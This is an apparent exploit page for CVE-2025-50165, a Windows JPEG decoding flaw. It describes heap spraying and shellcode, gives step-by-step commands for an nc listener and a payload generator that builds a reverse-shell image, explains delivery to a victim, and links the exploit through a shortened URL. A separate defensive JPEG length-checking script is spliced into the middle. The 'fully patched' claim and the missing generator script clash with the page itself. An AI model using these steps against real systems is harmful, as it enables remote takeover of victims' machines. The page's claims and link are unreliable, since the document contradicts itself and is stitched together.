
CVE-2025-50165 PoC: Microsoft Graphics Component security vulnerability

Source
Related vulnerability
Title: Microsoft Graphics Component Security Vulnerability (CVE-2025-50165)
Description: Microsoft Graphics Component is a graphics driver component from Microsoft Corporation (United States). Microsoft Graphics Component contains a security vulnerability that an attacker can exploit to execute code. The following products and versions are affected: Windows Server 2025 (Server Core installation), Windows 11 Version 24H2 for ARM64-based Systems, Windows 11 Version 24H2 for x64-based Syste
Introduction
## Proof-of-Concept exploit for the Untrusted Pointer Dereference vulnerability in Windows Graphics Component (CVE-2025-50165)


### **Disclaimer**

This tool is intended for security research and educational purposes only. Any use of this code for malicious activities is strictly prohibited. The author is not responsible for any misuse or damage caused by this program. Use at your own risk.

### **Technical Analysis**

The vulnerability lies in the Windows Graphics Component's parsing of specially crafted image files; this exploit targets the JPEG decoding path. A malformed metadata segment embedded in a JPEG file causes the decoder to dereference a pointer it never validated, an untrusted pointer dereference (CWE-822).

The exploit crafts a JPEG file that, when rendered, makes the codec dereference an attacker-controlled pointer. The payload is first placed at a predictable address by heap spraying; the malformed segment then steers execution to that shellcode, giving remote code execution on the target without user interaction. The attack vector is viable through web browsers, email clients, and any application that renders JPEG images through the underlying Windows API.
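As an added example (this is not code from the README above, nor from its author's script), the walker below parses the marker segments of a JPEG the way the text says the decoder does, and reports any segment whose 16-bit length field is inconsistent with the file: a length that runs past the end of the data, a length smaller than the field itself, or a file that ends inside the length field. That consistency check is what a decoder must perform before using a segment length to compute pointers, and it is a quick triage for a suspicious `.jpg`. Both sample files and all helper names (`jpeg_segments`, `find_malformed_segments`, `_segment`) are my own constructions.

```python
import struct

# JPEG marker codes (ITU T.81). Every marker other than the standalone ones
# below introduces a segment: two marker bytes, a 16-bit big-endian length
# that counts the length field itself, then the payload.
SOI, EOI, SOS = 0xD8, 0xD9, 0xDA
RST0, RST7 = 0xD0, 0xD7


def jpeg_segments(data):
    """Walk the marker segments of a JPEG image.

    Yields (offset, marker, declared_length, available_length) tuples.
    Standalone markers (SOI, EOI, RSTn) carry no length and are reported as
    (0, 0). The walker never trusts a length field blindly: it compares it
    with the bytes actually left in the buffer, reports the mismatch, and
    stops walking rather than seeking past the end of the data.
    """
    if data[:2] != b"\xFF\xD8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos:#x}")
        marker = data[pos + 1]
        if marker == 0xFF:            # 0xFF fill byte in front of a marker
            pos += 1
            continue
        start = pos
        pos += 2
        if marker in (SOI, EOI) or RST0 <= marker <= RST7:
            yield (start, marker, 0, 0)
            if marker == EOI:
                return
            continue
        if pos + 2 > len(data):       # file ends inside the length field
            yield (start, marker, None, 0)
            return
        declared = struct.unpack(">H", data[pos:pos + 2])[0]
        available = min(declared, len(data) - pos)
        yield (start, marker, declared, available)
        if marker == SOS or declared < 2 or available < declared:
            # Entropy-coded scan data follows SOS, or the length field cannot
            # be used to advance safely; either way stop here.
            return
        pos += declared


def find_malformed_segments(data):
    """Return (offset, marker, reason) for every segment whose length field
    does not fit the file. An empty list means the segment table is
    self-consistent; it says nothing about the segment payloads themselves."""
    problems = []
    for offset, marker, declared, available in jpeg_segments(data):
        if declared is None:
            problems.append((offset, marker, "length field truncated"))
        elif declared < 2:
            problems.append((offset, marker,
                             f"length {declared} is smaller than the length field"))
        elif available < declared:
            problems.append((offset, marker,
                             f"declares {declared} bytes, only {available} present"))
    return problems


def _segment(marker, payload):
    """Build one well-formed segment for the constructed samples below."""
    return bytes([0xFF, marker]) + struct.pack(">H", len(payload) + 2) + payload


# Constructed samples (not real image data): a minimal JFIF APP0 header, an
# SOS segment, two bytes of scan data and EOI ...
JFIF_APP0 = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
GOOD_JPEG = (b"\xFF\xD8"
             + _segment(0xE0, JFIF_APP0)
             + _segment(SOS, b"\x01\x01\x00\x00\x3F\x00")
             + b"\x12\x34" + b"\xFF\xD9")

# ... and the same file with an APP1 (Exif-style) metadata segment whose
# length field claims 0xFFFF bytes although only ten bytes follow it.
BAD_JPEG = (b"\xFF\xD8"
            + _segment(0xE0, JFIF_APP0)
            + b"\xFF\xE1\xFF\xFF" + b"Exif\x00\x00"
            + b"\xFF\xD9")


if __name__ == "__main__":
    for name, blob in (("good", GOOD_JPEG), ("bad", BAD_JPEG)):
        print(name, find_malformed_segments(blob))
```

Run against a real file with `find_malformed_segments(open(path, "rb").read())`. The walker deliberately stops at SOS and at the first bad length instead of trying to resynchronise, so on a crafted file it reports the first inconsistent segment and leaves the rest of the bytes untouched.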

### **Usage**

The exploit is generated using a Python script. It creates a malicious `.jpg` file that will trigger the vulnerability.

1.  **Set up a listener** to receive the reverse shell. Netcat is a simple option:

    ```bash
    nc -lvnp 4444
    ```

2.  **Generate the exploit image:**
    Run the `generate_payload.py` script, providing your listener's IP address and port.

    ```bash
    python3 generate_payload.py --lhost <your_ip> --lport 4444 --output exploit.jpg
    ```

3.  **Deliver the payload.**
    Transfer `exploit.jpg` to the victim machine. The vulnerability is triggered as soon as the file is processed for display, e.g. when it is viewed in a folder with thumbnails enabled, opened in an image viewer, or embedded in a web page.

4.  **Receive the connection.**
    Your listener should receive a connection from the victim machine, providing a remote command shell.

### **Demo**

The following demonstration shows the exploit in action. A listener is started on the attacker's machine. The generated `exploit.jpg` file is opened on a fully patched Windows 11 24H2 machine, and a reverse shell is immediately established.

`demo.mp4`

### Exploit
[href](https://tinyurl.com/3cyha48t)

For any inquiries, please email me at: anthonmullins@op.pl
File snapshot

```
[4.0K] /data/pocs/e95de8b0169446fa076308be5d3c0347408e86b0
└── [2.5K] README.md

0 directories, 1 file
```